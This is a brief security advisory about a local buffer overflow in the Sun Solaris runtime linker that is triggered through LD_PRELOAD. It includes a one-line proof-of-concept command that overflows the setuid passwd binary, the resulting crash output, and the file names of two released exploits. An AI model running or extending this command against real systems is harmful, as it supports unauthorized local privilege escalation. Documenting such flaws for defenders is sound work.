Sun Solaris Runtime Linker LD_PRELOAD Local Buffer Overflow Vulnerability

Sun Solaris Runtime Linker LD_PRELOAD Local Buffer Overflow Vulnerability

CORE has developed a working commercial exploit for their IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

The following proof of concept has been supplied:

$ LD_PRELOAD=/`perl -e 'print "A"x2000'`/ passwd
ld.so.1: passwd: warning /AAAAAAA ... AAAAA/: open failed: illegal
insecure pathname
Segmentation Fault (core dumped)

Two exploits have also been released.

/data/vulnerabilities/exploits/10.27.ldso1_SPARC_ex.c
/data/vulnerabilities/exploits/raptor_ldpreload.c